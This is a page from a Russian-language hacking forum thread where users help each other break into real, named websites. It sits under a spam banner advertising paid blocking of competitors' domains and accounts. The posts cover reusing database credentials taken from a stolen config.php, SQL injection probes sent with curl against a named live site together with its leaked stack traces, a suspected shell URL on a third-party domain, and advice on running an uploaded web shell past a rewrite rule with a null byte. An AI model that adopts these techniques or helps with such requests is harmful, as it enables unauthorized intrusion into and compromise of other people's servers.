УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 118 из 296

118

Опции темы

Поиск в этой теме

Опции просмотра

#1171

25.03.2016, 23:39

RWD

Guest

Сообщений: n/a

Провел на форуме:
56255

Репутация: 2

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
Нееее,в sqlmapу у меня на прокси жалуется,мол прокси нужно . Так что помоги как-нибудь по другому .

да нет там ничего, с чего вы взяли что там уязвимость?

#1172

26.03.2016, 21:06

.Light.

Guest

Сообщений: n/a

Провел на форуме:
65956

Репутация: 0

Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?

#1173

26.03.2016, 22:51

Zen1T21

Guest

Сообщений: n/a

Провел на форуме:
51991

Репутация: 2

Цитата:

Сообщение от .Light.

.Light. said:
↑
Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?

Поищи phpmyadmin

#1174

27.03.2016, 12:37

RWD

Guest

Сообщений: n/a

Провел на форуме:
56255

Репутация: 2

http://peterking.si.com/p.php?act=Function

Кто знает что это и с чем его едят?

#1175

27.03.2016, 17:09

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от RWD

RWD said:
↑
http://peterking.si.com/p.php?act=Function
Кто знает что это и с чем его едят?

Очень похож на шел

#1176

27.03.2016, 17:53

RWD

Guest

Сообщений: n/a

Провел на форуме:
56255

Репутация: 2

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Очень похож на шел

у меня таких много, если кто может помочь разобраться скину еще.

#1177

28.03.2016, 13:26

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от RWD

RWD said:
↑
да нет там ничего, с чего вы взяли что там уязвимость?

была там скуль, натравили наверно стопитцот sqlmap'ов -_- , всё уже закрыли

децл лога осталось, не обычная кстати скуль была....

Код:

Code:
curl 'https://mixdrop.ru/?ref=100/*fff*/'
Syntax error, unexpected token *, near to 'fff*/ AND ip = '*.*.*.*' LIMIT :APL0:', when parsing: SELECT [Ref].* FROM [Ref] WHERE user_id = 100/*fff*/ AND ip = '*.*.*.*' LIMIT :APL0: (90)
#0 [internal function]: Phalcon\Mvc\Model\Query->parse()
#1 [internal function]: Phalcon\Mvc\Model\Query->execute()
#2 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 100/*...')
#3 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 100/*...')
#4 [internal function]: GamesController->indexAction()
#5 [internal function]: Phalcon\Dispatcher->dispatch()
#6 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#7 {main}

curl 'https://mixdrop.ru/?ref=90+or+user_id=a()'
SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION mixdrop.ru.a does not exist
#0 [internal function]: PDOStatement->execute()
#1 [internal function]: Phalcon\Db\Adapter\Pdo->executePrepared(Object(PDOStatement), Array, Array)
#2 [internal function]: Phalcon\Db\Adapter\Pdo->query('SELECT `ref`.`i...', Array, Array)
#3 [internal function]: Phalcon\Mvc\Model\Query->_executeSelect(Array, Array, Array)
#4 [internal function]: Phalcon\Mvc\Model\Query->execute()
#5 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 90 o...')
#6 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 90 o...')
#7 [internal function]: GamesController->indexAction()
#8 [internal function]: Phalcon\Dispatcher->dispatch()
#9 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#10 {main}

#1178

28.03.2016, 14:06

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Очень похож на шел

очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно

сорцы если что https://github.com/jakehu/phpinfo-by.../master/tz.php

#1179

28.03.2016, 14:30

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно
сорцы если что
https://github.com/jakehu/phpinfo-by.../master/tz.php

Я тоже н не нашёл, ну я там особо не глядел, там есть коннект к БД. И Возможно, скорее всего залиться через него варианта не будет. Это как бы техничиский монитор

#1180

28.03.2016, 16:19

Lazy

Guest

Сообщений: n/a

Провел на форуме:
25673

Репутация: 3

Закинул я шелл в upload : site.com/upload/shell

Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html

Сервер шелл не хочет открывать - такого файла у него нет .

Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.

Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .

Можно ли как-то победить rewrite или мертвый номер ?